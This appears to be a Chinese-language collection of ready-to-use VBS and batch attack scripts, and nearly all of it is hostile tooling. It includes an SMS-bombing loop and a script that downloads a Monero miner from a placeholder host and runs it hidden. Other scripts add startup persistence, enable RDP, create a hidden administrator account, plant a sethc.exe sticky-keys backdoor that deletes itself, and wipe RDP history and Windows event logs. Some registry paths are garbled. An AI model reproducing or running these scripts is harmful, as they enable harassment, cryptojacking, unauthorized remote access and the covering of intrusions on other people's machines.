短信轰炸.vbs
Dim btn,ie Set ie = WScript.CreateObject("InternetExplorer.Application") ie.Visible = true '若为false,则不显示浏览器 ie.navigate "http://www.dooccn.com/php7/#id/53e57045ca9d15fe" 'http://www.dooccn.com/php7/#id/f16690b98a87d61c72e8a09fac740a53进去把15555555555换成你想要炸的号码,然后点击分享当前代码。把分享代码的连接复制进目标连接就OK了 Do 'Do Loop 是一个循环结构 Do Wscript.Sleep 200 Loop Until ie.readyState = 4 '等页面载入完整再填登录数据登录 Set btn =ie.Document.getElementById("btn") btn.click Wscript.Sleep 5000 '每隔五秒轰炸一次 Loop
门罗币挖矿.vbs
Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP") objXMLHTTP.open "GET","http://xxx.xxx.xxx.xxx/mdx.exe",false '后台下载挖矿软件mdx.exe objXMLHTTP.send() If objXMLHTTP.Status=200 Then Set objADOStream=CreateObject("ADODB.Stream") objADOStream.Open objADOStream.Type=1 objADOzStream.Write objXMLHTTP.ResponseBody objADOStream.Position=0 objADOStream.SaveToFile "mdx.exe" objADOStream.Close Set objADOStream=Nothing End if Set objXMLHTTP=Nothing Set objShell=CreateObject("WScript.Shell") '后台挖矿 objShell.Run"mdx.exe -o stratum+tcp://xxxxxxxx.com:3333 -u 46E9UkTFqALXNh2mSbAfskfsVgUgPVdT9ZdtweLRvAhWmbvuY1dh5ZRb4qJzFXLVHGYH4moQ -p x",0,TRUE
开机自启.vbs
dim fso,ws,pt,msg '把这个加到你vbs的最前面 set fso = createobject("scripting.filesystemobject") set ws = createobject("wscript.shell") set file = fso.getfile(wscript.scriptfullname) pt = ws.specialfolders("startup")&"" file.copy pt sub Close_Process(ProcessName) On Error Resume Next end sub
开3389+非net创建管理用户+Shift后门+自删除脚本.vbs
on error resume next const HKEY_LOCAL_MACHINE = &H80000002 strComputer = "." Set StdOut = WScript.StdOut Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\" &_ strComputer & " ootdefault:StdRegProv") strKeyPath = "SYSTEMCurrentControlSetControlTerminal Server" oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEMCurrentControlSetControlTerminal ServerWds dpwdTds cp" oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" strKeyPath = "SYSTEMCurrentControlSetControlTerminal Server" strValueName = "fDenyTSConnections" dwValue = 0 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue strKeyPath = "SYSTEMCurrentControlSetControlTerminal ServerWds dpwdTds cp" strValueName = "PortNumber" dwValue = 3389 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue strKeyPath = "SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" strValueName = "PortNumber" dwValue = 3389 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue on error resume next dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="0x7863$":password="3253220":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath On Error Resume Next Dim obj, success Set obj = CreateObject("WScript.Shell") success = obj.run("cmd /c takeown /f %SystemRoot%system32sethc.exe&echo y| cacls %SystemRoot%system32sethc.exe /G %USERNAME%:F© %SystemRoot%system32cmd.exe %SystemRoot%system32acmd.exe© %SystemRoot%system32sethc.exe %SystemRoot%system32asethc.exe&del %SystemRoot%system32sethc.exe&ren %SystemRoot%system32acmd.exe sethc.exe", 0, True) CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName) BY:c32 QQȺ:43910940 BLOG:www.19aq.com
去密码.vbs
Set args = WScript.Arguments if args.count<>1 then msgbox "db.mdb":wscript.quit Set conn =CreateObject("ADODB.Connection") pwd="密"&chr(13)&chr(9)&chr(10)&"码"&chr(2) connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & args(0)&" ;Mode=Share Deny Read|Share Deny Write;Persist Security Info=False;Jet OLEDB:Database Password="&pwd&";" conn.open connstr conn.execute("ALTER DATABASE Password [123456] ["&pwd&"]") conn.close msgbox "done"
清除3389远程桌面连接痕迹.bat
@echo off @reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f @del "%USERPROFILE%My DocumentsDefault.rdp" /a @exit
清除日志.bat
@echo off choice /t 60 /d y /n >nul '延迟60秒执行
echo on error resume next>clear.vbs echo set wmi_clear=getobject("winmgmts:\. ootcimv2")>>clear.vbs echo dim lianan_names(2)>>clear.vbs echo lianan_names(0)="application">>clear.vbs echo lianan_names(1)="security">>clear.vbs echo lianan_names(2)="system">>clear.vbs echo for each lianan_name in lianan_names>>clear.vbs echo set lianan_logs=wmi_clear.execquery("select * from win32_nteventlogfile where logfilename='"^&lianan_name^&"'")>>clear.vbs echo for each lianan_log in lianan_logs>>clear.vbs echo lianan_log.cleareventlog()>>clear.vbs echo next>>clear.vbs echo next>>clear.vbs clear.vbs del /f /q clear.vbs del %0 '删除本身 exit